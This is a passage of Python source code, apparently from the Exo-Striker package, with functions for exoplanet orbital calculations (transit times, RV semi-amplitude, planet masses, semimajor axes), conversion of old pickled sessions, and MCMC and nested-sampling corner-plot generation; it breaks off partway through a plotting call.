https://github.com/3fon3fonov/exostriker/issues
"""%result6
)
def transit_tperi_old(per, ecc, om, ma, epoch):
"""It derives Time of periatron [tp]
and time of mid transit [t0]
Parameters
----------
per : float
Period of the planet [days].
ecc : float
Eccentricity of the orbit.
om : float
Argument of periastron [deg]
ma : float
Mean anomaly [deg].
epoch : float
Epoch for wich the orbital elements are valid [BJD].
Returns
-------
[tp,t0]
if the epoch in is BJD then tp and t0 are also in BJD.
"""
om = np.radians(om)
ma = np.radians(ma)
E = 2.0*np.arctan( np.sqrt( ( (1.0-ecc)/(1.0+ecc) ) ) * np.tan( (np.pi/4.0)-(om/2.0) ) )
t_peri = epoch - ((ma/TAU)*per)
t_transit = t_peri + (E + ecc*np.sin(E)) * (per/TAU)
return t_peri, t_transit
def transit_tperi(per, ecc, om, ma, epoch, primary = True):
"""It derives Time of periatron [tp]
and time of mid transit [t0]
Parameters
----------
per : float
Period of the planet [days].
ecc : float
Eccentricity of the orbit.
om : float
Argument of periastron [deg]
ma : float
Mean anomaly [deg].
epoch : float
Epoch for wich the orbital elements are valid [BJD].
Returns
-------
[tp,t0]
if the epoch in is BJD then tp and t0 are also in BJD.
"""
trueA = np.pi/2.0
om = np.radians((om)%360)
#ma = np.radians(ma)
f = trueA - om
E = 2.0*np.arctan( np.sqrt( (1.0-ecc)/(1.0+ecc) ) * np.tan(f/2.0) )
t_peri = epoch - (per/TAU)*(E - ecc*np.sin(E))
t_transit = t_peri + (E - ecc*np.sin(E)) * (per/TAU)
if primary != True:
trueA = 3.0 * np.pi/2.0
f = trueA - om
E = 2.0*np.arctan( np.sqrt( (1.0-ecc)/(1.0+ecc) ) * np.tan(f/2.0) )
t_transit = t_peri + (E - ecc*np.sin(E)) * (per/TAU)
return t_peri, t_transit
return t_peri, t_transit
def get_m0(per, ecc, om, t0, epoch):
'''
'''
om = np.radians(om)
f = np.pi/2.0 - om
E = 2.0*np.arctan( np.sqrt( (1.0-ecc)/(1.0+ecc) ) * np.tan(f/2.0) )
# t_peri = epoch - (per/TAU)*(E - ecc*np.sin(E))
# print(t_peri)
# t0 = 2458334.3166
#m0 = E - ecc*np.sin(E) + 2.0*np.pi*( (epoch-t0)/per % 1.)
#ma = np.degrees(ma)%360.0
ma = E - ecc*np.sin(E)
m0 = ma + 2.0*np.pi*( (epoch-t0)/per % 1.)
#m0 = ma - (t0-epoch)* 2.0*np.pi/per
m0 = np.degrees(m0)%360.0
return m0
def ma_from_epoch(per, t_peri, epoch):
'''
'''
ma = np.degrees(2.0*np.pi*( (epoch-t_peri)/per % 1.))
return ma
def mass_to_K(P,ecc,incl, pl_mass,Stellar_mass):
'''Returns the RV semi-amplitude K in m/s
Parameters
----------
P : float
Period of the planet in [d]
ecc : float
eccentricity
incl: float
inclination in [deg]
pl_mass: float
planet mass in [Msol]
Stellar_mass: float
Primary mass in [Msol]
Returns
float
K in [m/s]
-------
'''
THIRD = 1.0/3.0
GMSUN = 1.32712497e20
AU=1.49597892e11
T = P*86400.0
#K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
# (Stellar_mass+pl_mass)**(2.0/3.0)) * 1.0/np.sqrt(1.0-ecc**2.0)
# K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
# (Stellar_mass+pl_mass)**(2.0/3.0))
K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
(Stellar_mass+pl_mass)**(2.0/3.0)) * 1.0/np.sqrt(1.0-ecc**2.0)
return K
def get_mass(K, P, ecc, i, Stellar_mass):
'''Returns the mass in
Parameters
----------
K : float
Semi-amplitude of the RV signal in [m/s]
P : float
Period of the planet in [d]
ecc : float
eccentricity
incl: float
inclination in [deg]
Stellar_mass: float
Primary mass in [Msol]
Returns
float
planet mass in [Mj]
-------
'''
T = P*86400.0
THIRD = 1.0/3.0
GMSUN = 1.32712497e20
msini = (T/(2.0*np.pi*GMSUN))**THIRD * K * Stellar_mass**(2./3) * np.sqrt(1.0-ecc**2.0)
msini = msini/np.sin(np.radians(i))*1047.70266835
return msini
def get_gravity(m_p, r_p):
'''Returns the gravity in
Parameters
----------
m_p in kg
r_p in m
Returns
float
g mass in in m/s^2
-------
'''
G = 6.67e-11
return G*m_p/r_p**2
def a_to_P(a,m0):
GMSUN = 1.32712497e20
AU=1.49597892e11
T = np.sqrt( (a*AU)**3.0 * (2.0*np.pi)**2.0 /(GMSUN*(m0)))
T = T /86400.0
return T
def P_to_a(P,m0):
GMSUN = 1.32712497e20
AU=1.49597892e11
P = P * 86400.0
a = ((P**2.0 * (GMSUN*(m0)))/(4.0*(np.pi)**2.0))**(1.0/3.0)
return a/AU
def get_transit_times(tr_res, p, t0, precise = False, verbose=False):
'''Returns linear transit times (approximate!)
Parameters
----------
-------
'''
#t_ind = np.where(np.logical_and(t >= t0-0.17, t <= t0+0.17))
#transits = t0 + p
t = tr_res[2][0]
f = tr_res[2][3]
range_ = int(max(t-t[0])/p)+1
tr_index = []
tr_t0 = []
#tran_t0 = t0
for i in range(range_):
tran_t0 = t0 + p*i
tr_ind = np.where(np.logical_and(t >= tran_t0-0.17, t <= tran_t0+0.17))
#print(i,tran_t0)
if len(t[tr_ind]) !=0:
minn = np.argmin(f[tr_ind])
tr_index.append(i)
tr_t0.append(t[tr_ind][minn])
if precise:
t = tr_res[3][0]
f = tr_res[3][1]
tr_t0 = []
for i in tr_index:
tran_t0 = t0 + p*i
tr_ind = np.where(np.logical_and(t >= tran_t0-0.07, t <= tran_t0+0.07))
minn = np.argmin(f[tr_ind])
tr_t0.append(t[tr_ind][minn])
if verbose == True:
for i in range(len(tr_index)):
print(tr_index[i],tr_t0[i])
return [tr_index, tr_t0]
####################### mass_semimajor ###########################################
def get_mass_a(obj, mass_type="J"):
'''Calculates the actual masses and Jacobi semimajor axes of a
system for using the parameters P, K and e from a Kepler fit.
The output of the semi-major axis is in AU.
if mass_type="J" the mass is in Jupiter masses (deafault)
if mass_type="E" the mass is in Erath masses (deafault)
else, e.g., mass_type="" mass is in Solar units.
'''
THIRD = 1.0/3.0
PI = 3.14159265358979e0
TWOPI = 2.0*PI
GMSUN = 1.32712497e20
AU=1.49597892e11
mass = np.zeros(10)
ap = np.zeros(9)
pl_mass = np.zeros(9)
mpold = pl_mass
#*******G is set to be unit, and s, m, kg as unit of time, length and mass
#***** and there is a reason for that! later I might correct for that.
mtotal = obj.st_mass[0]
f = 5e-6
for i in range(obj.npl):
T = obj.P[i]*86400.0
mass[0] = obj.st_mass[0]
# we need innitial guess for each planet mass
dm = 0
mass[i+1] = abs(obj.K[i])*(T*(obj.st_mass[0])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-obj.e[i]**2.0)/abs(np.sin(np.radians(obj.i[i])))
mpold[i] = mass[i+1]
# This is a simple iteration to solve for mp
while (dm <= 0):
if i == 0:
mtotal = obj.st_mass[0]
mass[i+1] = abs(obj.K[i])*(T*(obj.st_mass[0] + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-obj.e[i]**2.0)/abs(np.sin(np.radians(obj.i[i])))
mtotal = obj.st_mass[0]
for j in range(i):
mtotal = mtotal + mass[j+1]
mass[i+1] = abs(obj.K[i])*(T*(mtotal + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-obj.e[i]**2.0)/abs(np.sin(np.radians(obj.i[i])))
dm = (mpold[i] - mass[i+1])
mpold[i] = mpold[i] + f
# print mass[i+1], mpold[i]
ap[i] = (GMSUN*(mtotal + mass[i+1])*(T/TWOPI)**2)**THIRD
# for i in range(npl+1):
# mass[i] = mass[i]*GMSUN
for i in range(obj.npl):
ap[i] = ap[i]/AU # to be in AU
if mass_type=="J":
pl_mass[i] = mass[i+1]*1047.70266835 # to be in Jup. masses
elif mass_type=="E":
pl_mass[i] = mass[i+1]*1047.70266835 * 317.82838 # to be in Earth. masses
else:
pl_mass[i] = mass[i+1]
# I have seen that 1 Sol Mass = 1047.92612 Jup. masses???
return pl_mass,ap
def LoadSession(input_file, template_session = None):
try:
file_pi = open(input_file, 'rb')
fit_new = dill.load(file_pi) #, encoding='latin1'
file_pi.close()
except (UnicodeDecodeError, ImportError, KeyError) as e:
py3_ses = convert_Session_to_Py3(input_file)
file_pi = open(py3_ses, 'rb')
fit_new = dill.load(file_pi) #, encoding='latin1'
file_pi.close()
if template_session != None:
fit_new = check_for_missing_instances(template_session,fit_new)
#self.check_for_missing_instances(fit_new)
#self.check_settings()
check_temp_RV_file(fit_new)
return fit_new
def convert_Session_to_Py3(old_ses):
"""
Convert a Python 2 sesion to Python 3
"""
# Make a name for the new pickle
new_ses = os.path.splitext(os.path.basename(old_ses))[0]+"_p3.ses"
# Convert Python 2 "ObjectType" to Python 3 object
dill._dill._reverse_typemap["ObjectType"] = object
# Open the pickle using latin1 encoding
with open(old_ses, "rb") as f:
loaded = dill.load(f, encoding="latin1")
f.close()
# Re-save as Python 3 pickle
with open(new_ses, "wb") as outfile:
dill.dump(loaded, outfile)
outfile.close()
return new_ses
def fix_old_to_session_tra(old_ses):
################ Some problems with old sessions are fixed here. TB removed later on.# #############
if len(old_ses.tra_data_sets) == 20:
return old_ses
else:
for i in range(10):
old_ses.tra_data_sets[10 + i] = []
old_ses.tra_data_sets_init[10 + i] = []
old_ses.ld_m = ["quadratic"]*20 #limb darkening model
old_ses.ld_u[10 + i] = [0.12, 0.35 ]
old_ses.ld_u_lin[10 + i] = [0.35]
old_ses.ld_u_quad[10 + i] = [0.12, 0.35 ]
old_ses.ld_u_nonlin[10 + i] = [0.55,0.12, 0.35,-0.11]
old_ses.ld_u_lin_use[10 + i] = [False]
old_ses.ld_u_quad_use[10 + i] = [False, False]
old_ses.ld_u_nonlin_use[10 + i] = [False, False,False, False]
old_ses.ld_u_lin_err[10 + i] = [[0.0,0.0]]
old_ses.ld_u_quad_err[10 + i] = [[0.0,0.0], [0.0,0.0]]
old_ses.ld_u_nonlin_err[10 + i] = [[0.0,0.0], [0.0,0.0],[0.0,0.0], [0.0,0.0]]
old_ses.ld_u_lin_bound[10 + i] = np.array([[-1.0,1.0]])
old_ses.ld_u_quad_bound[10 + i] = np.array([[-1.0,1.0],[-1.0,1.0]])
old_ses.ld_u_nonlin_bound[10 + i] = np.array([[-1.0,1.0],[-1.0,1.0],[-1.0,1.0],[-1.0,1.0]])
old_ses.ld_u_lin_norm_pr[10 + i] = np.array([[0.1,0.05, False]])
old_ses.ld_u_quad_norm_pr[10 + i] = np.array([[0.0,1.0, False],[0.0,1.0, False]])
old_ses.ld_u_nonlin_norm_pr[10 + i] = np.array([[0.0,1.0, False],[0.0,1.0, False],[0.0,1.0, False],[0.0,1.0, False]])
old_ses.ld_u_lin_jeff_pr[10 + i] = np.array([[0.1,0.05, False]])
old_ses.ld_u_quad_jeff_pr[10 + i] = np.array([[0.0,1.0, False],[0.0,1.0, False]])
old_ses.ld_u_nonlin_jeff_pr[10 + i] = np.array([[0.0,1.0, False],[0.0,1.0, False],[0.0,1.0, False],[0.0,1.0, False]])
old_ses.ld_u_lin_str[10 + i] = [r'ld-quad-1$_%s$'%str(10 + i+1)]
old_ses.ld_u_quad_str[10 + i] = [r'ld-quad-1$_%s$'%str(10 + i+1),r'ld-quad-2$_%s$'%str(10 + i+1)]
old_ses.ld_u_nonlin_str[10 + i] = [r'ld-quad-1$_%s$'%str(10 + i+1),r'ld-quad-2$_%s$'%str(10 + i+1),r'ld-quad-3$_%s$'%str(10 + i+1),r'ld-quad-4$_%s$'%str(10 + i+1)]
old_ses.ld_gr.append(10 + i)
old_ses.ld_gr_ind.append(10 + i)
for i in range(20):
if len(old_ses.tra_data_sets[i]) != 0:
if len(old_ses.tra_data_sets[i]) ==11:
old_ses.tra_data_sets[i] = np.insert(old_ses.tra_data_sets[i], 9, True)
old_ses.tra_data_sets_init[i] = np.insert(old_ses.tra_data_sets_init[i], 9, True)
elif len(old_ses.tra_data_sets[i]) ==10:
old_ses.tra_data_sets[i] = np.insert(old_ses.tra_data_sets[i], 9, True)
old_ses.tra_data_sets_init[i] = np.insert(old_ses.tra_data_sets_init[i], 9, False)
old_ses.tra_data_sets[i] = np.insert(old_ses.tra_data_sets[i], 10, True)
old_ses.tra_data_sets_init[i] = np.insert(old_ses.tra_data_sets_init[i], 10, False)
return old_ses
########################################################################################################
def find_close_elements(a, b, precision = 0.01):
"""Finds close elements in two arrays with diffrent sizes.
Parameters
----------
a : array of floats with dimention of N
Description of parameter `a`.
b : array of floats with dimention of M
Description of parameter `b`.
precision : threshold withing which two elements are considered the same.
Description of parameter `precision`.
Returns
-------
[array, array]
returns two arrays with the elements that mathched withing the
precision.
"""
return [[x for x in a for i in b if abs(x - i) < precision], [x for x in b for i in a if abs(x - i) < precision]]
def custom_param_file_for_stability(max_time,time_step):
##### create the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
max_time = float(max_time)*365.25 # make it is days
param_file.write("""0.0d0 %s %s
%s %s
F T T T T F
0.001 50.0 50.0 -1. T
bin.dat
unknown
"""%(max_time, time_step, max_time/1e4, max_time/1e3 ))
param_file.close()
return
def add_mcmc_samples(obj,sampler):
bestfit_labels = ["median","mean","mode","best_samp","best_gui","none",
"mass","use_Me","use_Mj","use_Ms",
"semimajor","radius","use_Re","use_Rj","use_Rs","use_lambda", "use_ppm"]
bestfit_labels_bool = [obj.mcmc_save_median,obj.mcmc_save_means,obj.mcmc_save_mode,
obj.mcmc_save_maxlnL,False,False,False,
True,False,False,False,False,True,False,False,False,False]
sampler._lbf = {k: np.array([obj.e_for_mcmc[k], True]) for k in range(len(obj.e_for_mcmc))}
for k in range(17):
sampler._lbf[bestfit_labels[k]] = bestfit_labels_bool[k]
cornerplot_opt = {"bins":25,
"color":"k",
"reverse":False,
"upper":True,
"quantiles":68.3,
"levels":(0.6827, 0.9545,0.9973),
"smooth":1.0,
"smooth1d":1.0,
"plot_contours":True,
"show_titles":True,
"dpi":300,
"pad":15,
"labelpad":0,
"truth_color":'r',
"title_kwargs":{"fontsize": 12},
"scale_hist":True,
"fill_contours":False,
"no_fill_contours":True,
"plot_datapoints":True,
"stab_color":"r",
"stab_threshold":100000
}
sampler._lbf["cornerplot"] = cornerplot_opt
sampler._lbf["OrigLabels"] = dill.copy(obj.e_for_mcmc)
obj.mcmc_sampler=sampler
obj.sampler_saved=True
def add_ns_samples(obj,sampler):
bestfit_labels = ["median","mean","mode","best_samp","best_gui","none",
"mass","use_Me","use_Mj","use_Ms",
"semimajor","radius","use_Re","use_Rj","use_Rs","use_lambda","use_ppm"]
bestfit_labels_bool = [obj.ns_save_median,obj.ns_save_means,obj.ns_save_mode,
obj.ns_save_maxlnL,False,False,False,
True,False,False,False,False,True,False,False,False,False]
obj.ns_sampler= dill.copy(sampler.results)
obj.ns_sampler._lbf = {k: np.array([obj.e_for_mcmc[k], True]) for k in range(len(obj.e_for_mcmc))}
for k in range(17):
obj.ns_sampler._lbf[bestfit_labels[k]] = bestfit_labels_bool[k]
cornerplot_opt = {"bins":25,
"color":"k",
"reverse":False,
"upper":True,
"quantiles":68.3,
"levels":(0.6827, 0.9545,0.9973),
"smooth":1.0,
"smooth1d":1.0,
"plot_contours":True,
"show_titles":True,
"dpi":300,
"pad":15,
"labelpad":0,
"truth_color":'r',
"title_kwargs":{"fontsize": 12},
"scale_hist":True,
"fill_contours":False,
"no_fill_contours":True,
"plot_datapoints":True,
"stab_color":"r",
"stab_threshold":100000
}
obj.ns_sampler._lbf["cornerplot"] = cornerplot_opt
obj.ns_sampler._lbf["OrigLabels"] = dill.copy(obj.e_for_mcmc)
#delattr(obj.ns_sampler, 'rstate')
obj.sampler_saved=True
def get_quad_model(x,y,a1,a2,a3):
x = x - x[0]
y = y + a1 + a2*x + a3*x**2
return y
def get_airmass_model(x,y,a1,a2,a3):
#x = x - x[0]
#print(a1,a2,x[0:2],a2*x[0:2])
y = y + a1 + a2*x + a3*x**2
return y
def get_mode_of_samples(samples, nsamp):
mode_samp = []
# err1_samp = []
# err2_samp = []
for i in range(nsamp):
#ci = np.percentile(samples[:,i], [level, 100.0-level])
#mmm = stats.binned_statistic(np.array([samples[:,i]]), axis=None)
n, b = np.histogram(samples[:,i], bins=100)
n = gaussian_filter(n, 1.0)
x0 = np.array(list(zip(b[:-1], b[1:]))).flatten()
y0 = np.array(list(zip(n, n))).flatten()
k = np.unravel_index(y0.argmax(),y0.shape)
mode_samp.append(x0[k])
#err1_samp.append(x0[k]- ci[0])
#err2_samp.append(ci[1]- x0[k])
# print el_str[i],'=', x0[k], "- %s"%(x0[k]-ci[0]), "+ %s"%(ci[1] - x0[k] )
return mode_samp #,err1_samp,err2_samp
def get_mean_of_samples(samples, nsamp):
mean_samp = []
for i in range(nsamp):
mean_samp.append(np.mean(samples[:,i]))
return mean_samp
def get_median_of_samples(samples, nsamp):
median_samp = []
for i in range(nsamp):
median_samp.append(np.median(samples[:,i]))
return median_samp
def get_MAD_of_samples(samples, nsamp):
mad_samp = []
for i in range(nsamp):
mad_samp.append(np.mean(np.absolute(samples[:,i] - np.mean(samples[:,i]))))
return mad_samp
def get_best_lnl_of_samples(samples,lnl, nsamp):
best_ln_samp = []
lnL_best_idx = np.argmax(lnl)
lnL_best = lnl[lnL_best_idx]
for i in range(nsamp):
minlnL = samples[lnL_best_idx,i]
best_ln_samp.append(minlnL)
return best_ln_samp,lnL_best #,err1_samp,err2_samp
def cornerplot(obj, level=(100.0-68.3)/2.0, type_plot = 'mcmc', **kwargs):
#obj = dill.copy(copied_obj)
'''Generates a corner plot visualizing the mcmc samples. Optionally samples can be read from a file.'''
#self.mcmc_sample_file = 'mcmc_samples'+'_%s'%mod
#self.corner_plot_file = 'cornerplot.png'
if type_plot == 'mcmc':
#### load the samples, labels and lnL values
ln = dill.copy(np.hstack(obj.mcmc_sampler.lnL))
samples = dill.copy(np.array(obj.mcmc_sampler.samples))
#labels = dill.copy(obj.e_for_mcmc)
labels = dill.copy(obj.mcmc_sampler._lbf["OrigLabels"])
mod_labels = dill.copy(obj.mcmc_sampler._lbf)
if mod_labels['mean'] ==True:
best_fit_par = obj.mcmc_stat["mean"]
elif mod_labels['median']==True:
best_fit_par = obj.mcmc_stat["median"]
elif mod_labels['mode']==True:
best_fit_par = obj.mcmc_stat["mode"]
elif mod_labels['best_samp']==True:
best_fit_par = obj.mcmc_stat["best"]
elif mod_labels['none']==True:
best_fit_par = obj.par_for_mcmc
elif mod_labels['best_gui']==True:
best_fit_par = obj.par_for_mcmc
else:
best_fit_par = obj.par_for_mcmc
cornerplot_opt = dill.copy(obj.mcmc_sampler._lbf["cornerplot"])
elif type_plot == 'nest':
#### load the samples, labels and lnL values
#ln = dill.copy(obj.ns_sampler.results.logl)
# samples = dill.copy(np.array(obj.ns_sampler.results.samples))
ln = dill.copy(obj.ns_sampler.logl)
samples = dill.copy(np.array(obj.ns_sampler.samples))
#labels = dill.copy(obj.e_for_mcmc)
labels = dill.copy(obj.ns_sampler._lbf["OrigLabels"])
mod_labels = dill.copy(obj.ns_sampler._lbf)
if mod_labels['mean'] ==True:
best_fit_par = obj.nest_stat["mean"]
elif mod_labels['median']==True:
best_fit_par = obj.nest_stat["median"]
elif mod_labels['mode']==True:
best_fit_par = obj.nest_stat["mode"]
elif mod_labels['best_samp']==True:
best_fit_par = obj.nest_stat["best"]
elif mod_labels['none']==True:
best_fit_par = obj.par_for_mcmc
elif mod_labels['best_gui']==True:
best_fit_par = obj.par_for_mcmc
else:
best_fit_par = obj.par_for_mcmc
cornerplot_opt = dill.copy(obj.ns_sampler._lbf["cornerplot"])
else:
return
############### make "Gaussan" samples of the stellar parameters ##############
#m_s = np.random.normal(loc=obj.stellar_mass, scale=obj.stellar_mass_err, size=len(samples[:,0]))
#r_s = np.random.normal(loc=obj.stellar_radius, scale=obj.stellar_radius_err, size=len(samples[:,0]))
# L_s = np.random.normal(loc=obj.stellar_luminosity,scale=obj.stellar_luminosity_err,size=len(samples[:,0]))
# vsini = np.random.normal(loc=obj.stellar_vsini, scale=obj.stellar_vsini_err, size=len(samples[:,0]))
#
######### define new samples, labels and best-fit params to be refilled again
######### with masses, semi-major axes, etc. (to be re-worked).
m_s = []
r_s = []
samp = []
samp_labels = []
samp_best_fit_par = []
#print(best_fit_par)
for i in range(len(labels)):
ss = np.hstack(samples[:,i])
if mod_labels['use_ppm']:
if 'transit' in labels[i]:
ss = ss * 1000000.0
samp.append(ss)
samp_labels.append(labels[i])
samp_best_fit_par.append(best_fit_par[i])
index_to_keep = []
for i in range(len(labels)):
samp_labels[i] = mod_labels[i][0]
if mod_labels[i][1] == 'True':
index_to_keep.append(i)
samp = [samp[i] for i in index_to_keep]
samp_labels = [samp_labels[i] for i in index_to_keep]
samp_best_fit_par = [samp_best_fit_par[i] for i in index_to_keep]
letters = ['b','c','d','e','f','g','h'] #... For the planets
if mod_labels['use_lambda']:
for i in range(obj.npl):
let = letters[i]
if not 'e$_%s$'%let in labels or not '$\omega_%s$'%let in labels:
continue
Ma_ = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'MA$_%s$'%let]])
omega_ = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == '$\omega_%s$'%let]])
lambda_ = np.array(Ma_ + omega_)%360.0
samp.append(lambda_)
samp_labels.append(r' $\lambda_%s$'%let)
if mod_labels['mean']:
samp_best_fit_par.append((np.mean(Ma_) + np.mean(omega_))%360.0 )
elif mod_labels['median']:
samp_best_fit_par.append((np.median(Ma_) + np.median(omega_))%360.0 )
elif mod_labels['best_gui']:
samp_best_fit_par.append((Ma_[np.argmax(ln)] + omega_[np.argmax(ln)])%360.0 )
else:
samp_best_fit_par.append((Ma_[np.argmax(ln)] + omega_[np.argmax(ln)])%360.0 )
if mod_labels['mass']:
m_s = np.random.normal(loc=obj.stellar_mass, scale=obj.stellar_mass_err, size=len(ss))
for i in range(obj.npl):
let = letters[i]
if not 'K$_%s$'%let in labels or not 'P$_%s$'%let in labels:
continue
K = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'K$_%s$'%let]])
P = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'P$_%s$'%let]])
if obj.hkl == True and '$e sin(\omega_%s)$'%let in labels and '$e cos(\omega_%s)$'%let in labels:
esinw = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == '$e sin(\omega_%s)$'%let]])
ecosw = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == '$e cos(\omega_%s)$'%let]])
ecc = np.sqrt(esinw**2 + ecosw**2)
elif obj.hkl == False and 'e$_%s$'%let in labels:
ecc = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'e$_%s$'%let]])
else:
ecc = np.array([0]*len(K))
print("Warning, no eccentricity samples found for planet %s ! Assuming ecc = 0"%str(i+1))
if mod_labels['use_Me']:
M_fact = 317.82838
mass_lab = r'[M$_\oplus$]'
elif mod_labels['use_Mj']:
M_fact = 1
mass_lab = r'[M$_{\rm Jup.}$]'
elif mod_labels['use_Ms']:
M_fact = 1.0/1047.0
mass_lab = r'[M$_\odot$]'
if 'i$_%s$'%let in labels:
incl = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'i$_%s$'%let]])
samp_labels.append(r'm$_%s$ %s'%(let,mass_lab))
else:
incl = np.array([90]*len(K))
samp_labels.append(r'm $\sin i_%s$ %s'%(let,mass_lab))
samp.append(np.array(get_mass(K,P, ecc, incl, m_s) * M_fact))
if mod_labels['mean']:
samp_best_fit_par.append(get_mass(np.mean(K),np.mean(P),np.mean(ecc), np.mean(incl), np.mean(m_s)) * M_fact)
elif mod_labels['median']:
samp_best_fit_par.append(get_mass(np.median(K),np.median(P),np.median(ecc), np.median(incl), np.median(m_s)) *M_fact)
elif mod_labels['best_gui']:
samp_best_fit_par.append(obj.masses[i]*M_fact)
else:
samp_best_fit_par.append(get_mass(K[np.argmax(ln)],P[np.argmax(ln)], ecc[np.argmax(ln)], incl[np.argmax(ln)], obj.stellar_mass)*M_fact)
if mod_labels['semimajor']:
if len(m_s) == 0:
m_s = np.random.normal(loc=obj.stellar_mass, scale=obj.stellar_mass_err, size=len(samples[:,0]))
for i in range(obj.npl):
let = letters[i]
if not 'P$_%s$'%let in labels:
continue
P = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'P$_%s$'%let]])
samp.append(np.array(P_to_a(P,m_s)))
samp_labels.append(r'a$_%s$ [au]'%let)
if mod_labels['mean']:
samp_best_fit_par.append(P_to_a(np.mean(P),np.mean(m_s)))
elif mod_labels['median']:
samp_best_fit_par.append(P_to_a(np.median(P),np.median(m_s)))
elif mod_labels['best_gui']:
samp_best_fit_par.append(obj.semimajor[i])
else:
samp_best_fit_par.append(P_to_a(P[np.argmax(ln)],obj.stellar_mass))
if mod_labels['radius']:
r_s = np.random.normal(loc=obj.stellar_radius, scale=obj.stellar_radius_err, size=len(samples[:,0]))
for i in range(obj.npl):
let = letters[i]
if not 'R/$R_\star$ $%s$'%let in labels:
continue
if mod_labels['use_Re']:
R_fact = 109.076
rad_lab = r'[R$_\oplus$]'
elif mod_labels['use_Rj']:
R_fact = 9.955201593
rad_lab = r'[R$_{\rm Jup.}$]'
elif mod_labels['use_Rs']:
R_fact = 1.0
rad_lab = r'[R$_\odot$]'
rad = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'R/$R_\star$ $%s$'%let]]) * R_fact
samp.append(np.array(rad*r_s))
samp_labels.append(r'R$_%s$ %s'%(let,rad_lab))
if mod_labels['mean']:
samp_best_fit_par.append(np.mean(rad)*np.mean(r_s))
elif mod_labels['median']:
samp_best_fit_par.append(np.median(rad)*np.median(r_s))
else:
samp_best_fit_par.append(rad[np.argmax(ln)]*obj.stellar_radius)
# if mod_labels['gravity']:
# if len(r_s) == 0:
# r_s = np.random.normal(loc=obj.stellar_radius, scale=obj.stellar_radius_err, size=len(samples[:,0]))
################### Transpose is needed for the cornerplot. ###################
samples_ = np.transpose(samp)
#labels = samp_labels
best_fit_par =samp_best_fit_par
################### Verbose output (TBD). ###################
verbose = True
level = (100.0-68.3)/2.0
if verbose:
print(" ")
print(" ")
if mod_labels['mean']:
print("Means and their 1 sigma errors")
elif mod_labels['median']:
print("Median and their 1 sigma errors")
elif mod_labels['best_gui']:
print("Best-fit (GUI) and their 1 sigma errors")
else:
print("Best-fit (max. samp. lnL) and their 1 sigma errors")
for i in range(len(samp_best_fit_par)):
ci = np.percentile(samp[i], [level, 100.0-level])
if mod_labels['mean']:
print(samp_labels[i],'=', np.mean(samp[i]), "- %s"%(np.mean(samp[i])-ci[0]), "+ %s"%(ci[1] - np.mean(samp[i]) ))
elif mod_labels['median']:
print(samp_labels[i],'=', np.median(samp[i]), "- %s"%(np.median(samp[i])-ci[0]), "+ %s"%(ci[1] - np.median(samp[i]) ))
elif mod_labels['best_gui']:
print(samp_labels[i],'=', samp_best_fit_par[i], "- %s"%(samp_best_fit_par[i]-ci[0]), "+ %s"%(ci[1] - samp_best_fit_par[i] ))
else:
print(samp_labels[i],'=', samp[i][np.argmax(ln)], "- %s"%(samp[i][np.argmax(ln)]-ci[0]), "+ %s"%(ci[1] - samp[i][np.argmax(ln)] ))
print(" ")
print("Median Absolute Deviation values")
mad = get_MAD_of_samples(samples_,len(samp_labels))
for i in range(len(samp_labels)):
print(samp_labels[i],' MAD =', mad[i])
range_stab =[]
# for i in range(len(samp)):
# range_stab.append([0.0,1.0])
if mod_labels['none']==True:
best_fit_par = None
if "max. time" in labels:
samples_stab = []
samples_ = np.transpose(samples_)
for i in range(len(samples_)):
samples_stab.append(samples_[i][np.where(samples[:,-1]> cornerplot_opt["stab_threshold"])])
# print(max(samples[:,-1])-1000.0,max(samples[:,-1]))
range_stab.append([min(samples_[i]),max(samples_[i])])
N_samp = len(np.atleast_1d(samples_stab[0]))
samples_stab = np.transpose(samples_stab)
samples_ = np.transpose(samples_)
if N_samp > len(best_fit_par):
fig = corner.corner(samples_stab,
range = range_stab,
bins=cornerplot_opt["bins"],
color=cornerplot_opt["stab_color"],
reverse=cornerplot_opt["reverse"],
upper=cornerplot_opt["upper"],
labels=samp_labels,
quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973),
smooth=cornerplot_opt["smooth"],
smooth1d=cornerplot_opt["smooth1d"],
plot_contours=cornerplot_opt["plot_contours"],
show_titles=cornerplot_opt["show_titles"],
truths=best_fit_par,
dpi=cornerplot_opt["dpi"],
pad=cornerplot_opt["pad"],
labelpad=cornerplot_opt["labelpad"],
truth_color=cornerplot_opt["truth_color"],
title_kwargs={"fontsize": 12},
scale_hist=cornerplot_opt["scale_hist"],
no_fill_contours=cornerplot_opt["no_fill_contours"],
fill_contours=cornerplot_opt["fill_contours"],
plot_datapoints=cornerplot_opt["plot_datapoints"],
# data_kwargs={'zorder':10,'color':cornerplot_opt["stab_color"]},
contour_kwargs={'color':cornerplot_opt["stab_color"]},
hist_kwargs={'color':cornerplot_opt["stab_color"]},
kwargs={'zorder':10,'color':cornerplot_opt["stab_color"]}
)
else:
print("very few, or no stable samples !!!!!")
fig = corner.corner(samples_,
#range = range_stab,
bins=cornerplot_opt["bins"],
color=cornerplot_opt["color"],
reverse=cornerplot_opt["reverse"],
upper=cornerplot_opt["upper"],
labels=samp_labels,
quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973),
smooth=cornerplot_opt["smooth"],
smooth1d=cornerplot_opt["smooth1d"],
plot_contours=cornerplot_opt["plot_contours"],
show_titles=cornerplot_opt["show_titles"],
truths=best_fit_par,
dpi=cornerplot_opt["dpi"],
